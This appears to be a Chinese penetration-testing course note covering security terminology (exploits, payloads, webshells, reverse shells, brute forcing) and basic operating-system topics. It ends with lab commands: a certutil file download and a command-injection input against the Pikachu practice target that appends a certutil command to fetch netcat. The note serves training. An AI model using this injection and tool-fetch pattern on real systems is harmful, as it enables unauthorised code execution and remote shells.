[系统运维]day1 信息收集

一、名词解释

1. 渗透测试：渗透测试，是为了证明网络防御按照预期计划正常运行而提供的一种机制。渗透测试是指渗透人员在不同的位置（比如从内网、从外网等位置）利用各种手段对某个特定网络进行测试，以期发现和挖掘系统中存在的漏洞，然后输出渗透测试报告，并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告，可以清晰知晓系统中存在的安全隐患和问题。
2. 漏洞：漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。
3. 代码：代码（code）是程序员用开发工具所支持的语言写出来的源文件，是一组由字符、符号或信号码元以离散形式表示信息的明确的规则体系。
4. 前后端：对于web前端来说，通常是指网站的前台部分，包括网站的表现层和结构层：Web页面的结构、Web的外观视觉表现以及Web层面的交互实现；后端是在后台工作的，控制着前端的内容，主要负责程序设计架构思想，管理数据库等。后端更多的是与数据库进行交互以处理相应的业务逻辑，需要考虑的是如何实现功能、数据的存取、平台的稳定性与性能等，涉及动态语言如PHP、ASP、JSP等。
5. POC：全称 ’ Proof of Concept '，中文 ’ 概念验证 ’ ，常指一段漏洞证明的代码。
6. EXP：全称 ’ Exploit '，中文 ’ 利用 '，指利用系统漏洞进行攻击的动作。

注意：POC/EXP：POC是用来证明漏洞存在的，EXP是用来利用漏洞的，两者通常不是一类，或者说，PoC通常是无害的，Exp通常是有害的，有了POC，才有EXP。

5. Payload：中文 ’ 有效载荷
   '，指成功exploit之后，真正在目标系统执行的代码或指令。Payload有很多种，它可以是Shellcode，也可以直接是一段系统命令。同一个Payload可以用于多个漏洞，但每个漏洞都有其自己的EXP，也就是说不存在通用的EXP。
6. Shellcode：简单翻译 ’ shell代码
   '，是Payload的一种，由于其建立正向/反向shell而得名。Shellcode有很多种，包括正向的，反向的，甚至meterpreter。
7. 后门：后门，本意是指一座建筑背面开设的门，通常比较隐蔽，为进出建筑的人提供方便和隐蔽。在信息安全领域，后门是指绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目的就是方便以后再次秘密进入或者控制系统。
8. Webshell：webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境，主要用于网站管理、服务器管理、权限管理等操作。使用方法简单，只需上传一个代码文件，通过网址访问，便可进行很多日常操作，极大地方便了使用者对网站和服务器的管理。正因如此，也有小部分人将代码修改后当作后门程序使用，以达到控制网站服务器的目的。
9. 木马/病毒：木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码，是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。木马病毒其实是计算机黑客用于远程控制计算机的程序，将控制程序寄生于被控制的计算机系统中，里应外合，对被感染木马病毒的计算机实施操作。一般的木马病毒程序主要是寻找计算机后门，伺机窃取被控计算机中的密码和重要文件等。可以对被控计算机实施监控、资料修改等非法操作。木马病毒具有很强的隐蔽性，可以根据黑客意图突然发起攻击。
10. 反弹SHELL：反弹shell（reverse
    shell），就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse
    shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。
11. 回显：就是显示正在执行的批处理命令及执行的结果等。
12. 跳板：跳板，简单来说，就是为了隐藏自己的地址，让别人无法查找到自己的位置。
13. 黑白盒测试：黑盒测试又称为功能测试、数据驱动测试或基于规格说明书的测试，是一种从用户观点出发的测试。测试人员一般把被测程序当作一个黑盒子。白盒测试也称为结构测试或逻辑驱动测试，是针对被测单元内部是如何进行工作的测试。
14. 暴力破解：通过利用大量猜测和穷举的方式来尝试获取用户口令的攻击方式。就是猜口令咯，攻击者一直枚举进行请求，通过对比数据包的长度可以很好的判断是否爆破成功，因为爆破成功和失败的长度是不一样的，所以可以很好的判断是否爆破成功。
15. 社会工程学：建立理论并通过利用自然的、社会的和制度上的途径来逐步地解决各种复杂的社会问题。
    撞库：撞库是黑客通过收集互联网已泄露的用户和密码信息，生成对应的字典表，尝试批量登陆其他网站后，得到一系列可以登录的用户。
16. ATT&CK：ATT&CK 是指 Adversarial Tactics, Techniques, and Common
    Knowledges 。从名字中就能看出，他不是一项技术,而是更加底层“知识库”的基础资源。ATT&CK
    将真实环境中使用到的对抗技术，组织成了一套策略。他关注的不是单点的IOC，而是 IOC 处于攻击过程中的上下文。

二、操作系统

1. 用途
   个人计算机：台式机、笔记本、微型计算机（联想、戴尔、惠普、外星人等众多品牌）
   服务器用机：1U、2U服务器（量子、DELL、国产麒麟等型号）
2. 命令
   Windows&Linux常见命令
   (1) linux命令
   渗透测试中常用的linux命令
   (2) cmd命令
   常用的cmd命令
   (3) powershell
   Windows PowerShell 是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。它引入了许多非常有用的新概念，从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。
3. 权限
   文件权限&服务权限&用户权限等
4. 用户
   系统用户&用户组&服务用户等分类
5. 防火墙
   自带防火墙出站&入站规则策略协议

三、文件下载

文件下载命令一键生成

eg: 使用Windows cmd 下载文件：

certutil.exe -urlcache -split -f http://10.10.26.191:80/靶场环境，欢迎访问，请勿修改内容.txt 靶场环境，欢迎访问，请勿修改内容.txt

查看当前文件夹是否已经下载成功

四、反弹命令

反弹Shell命令一键生成

利用靶场环境Pikachu 远程命令/代码执行漏洞演示：

首先下载win版的nc命令

127.0.0.1 &certutil.exe -urlcache -split -f https://eternallybored.org/misc/netcat/netcat-win32-1.11.zip nc.zip